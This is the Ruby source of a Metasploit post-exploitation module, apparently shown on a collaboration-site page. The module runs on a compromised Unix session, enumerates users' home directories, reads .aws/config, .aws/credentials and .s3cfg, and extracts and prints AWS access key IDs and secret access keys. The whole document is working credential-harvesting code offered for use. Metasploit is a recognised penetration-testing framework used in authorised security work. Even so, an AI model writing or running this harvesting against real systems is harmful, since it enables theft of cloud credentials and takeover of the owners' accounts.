Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Unix
9

10
  AWS_KEY = 'AWS_ACCESS_KEY_ID'
11
  AWS_SECRET = 'AWS_SECRET_ACCESS_KEY'
12
  S3_KEY = 'access_key'
13
  S3_SECRET = 'secret_key'
14

15
  def initialize(info = {})
16
    super(
17
      update_info(
18
        info,
19
        'Name' => 'UNIX Gather AWS Keys',
20
        'Description' => %q{
21
          This module will attempt to read AWS configuration files
22
          (.aws/config, .aws//credentials and .s3cfg) for users discovered
23
          on the session'd system and extract AWS keys from within.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
27
        'Platform' => ['linux', 'osx', 'unix', 'solaris', 'bsd'],
28
        'SessionTypes' => %w[shell meterpreter],
29
        'References' => [
30
          [ 'URL', 'http://s3tools.org/kb/item14.htm' ],
31
          [ 'URL', 'http://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html#cli-config-files' ]
32
        ]
33
      )
34
    )
35
  end
36

37
  def get_aws_keys(config_file)
38
    keys_data = []
39
    unless readable? config_file
40
      vprint_error("Couldn't read #{config_file}")
41
      return []
42
    end
43
    config_s = read_file(config_file)
44
    return keys_data if config_s.empty?
45

46
    aws_config = Rex::Parser::Ini.from_s(config_s)
47
    aws_config.each_key do |profile|
48
      # XXX: Ini assumes anything on either side of the = is the key and value
49
      # including spaces, so we need to fix this
50
      profile_config = Hash[aws_config[profile].map { |k, v| [ k.strip, v.strip ] }]
51
      aws_access_key_id = nil
52
      aws_secret_access_key = nil
53
      profile_config.each_pair do |key, value|
54
        if key == AWS_KEY.downcase || key == S3_KEY
55
          aws_access_key_id = value
56
        end
57

58
        if key == AWS_SECRET.downcase || key == S3_SECRET
59
          aws_secret_access_key = value
60
        end
61
      end
62
      next unless aws_access_key_id || aws_secret_access_key
63

64
      keys_data << [ config_file, aws_access_key_id, aws_secret_access_key, profile ]
65
    end
66

67
    keys_data
68
  end
69

70
  def get_keys_from_files
71
    keys_data = []
72
    vprint_status('Enumerating possible user AWS config files')
73
    # build up a list of aws configuration files to read, including the
74
    # configuration files that may exist (rare)
75
    enum_user_directories.map do |user_dir|
76
      vprint_status("Looking for AWS config/credentials files in #{user_dir}")
77
      %w[.aws/config .aws/credentials .s3cfg].each do |possible_key_file|
78
        this_key_data = get_aws_keys(::File.join(user_dir, possible_key_file))
79
        next if this_key_data.empty?
80

81
        keys_data <<= this_key_data.flatten
82
      end
83
    end
84
    keys_data
85
  end
86

87
  def run
88
    keys_data = get_keys_from_files
89
    return if keys_data.empty?
90

91
    keys_table = Rex::Text::Table.new(
92
      'Header' => 'AWS Key Data',
93
      'Columns' => [ 'Source', AWS_KEY, AWS_SECRET, 'Profile' ]
94
    )
95

96
    keys_data.each do |key_data|
97
      keys_table << key_data
98
    end
99

100
    print_line(keys_table.to_s)
101
  end
102
end
103

104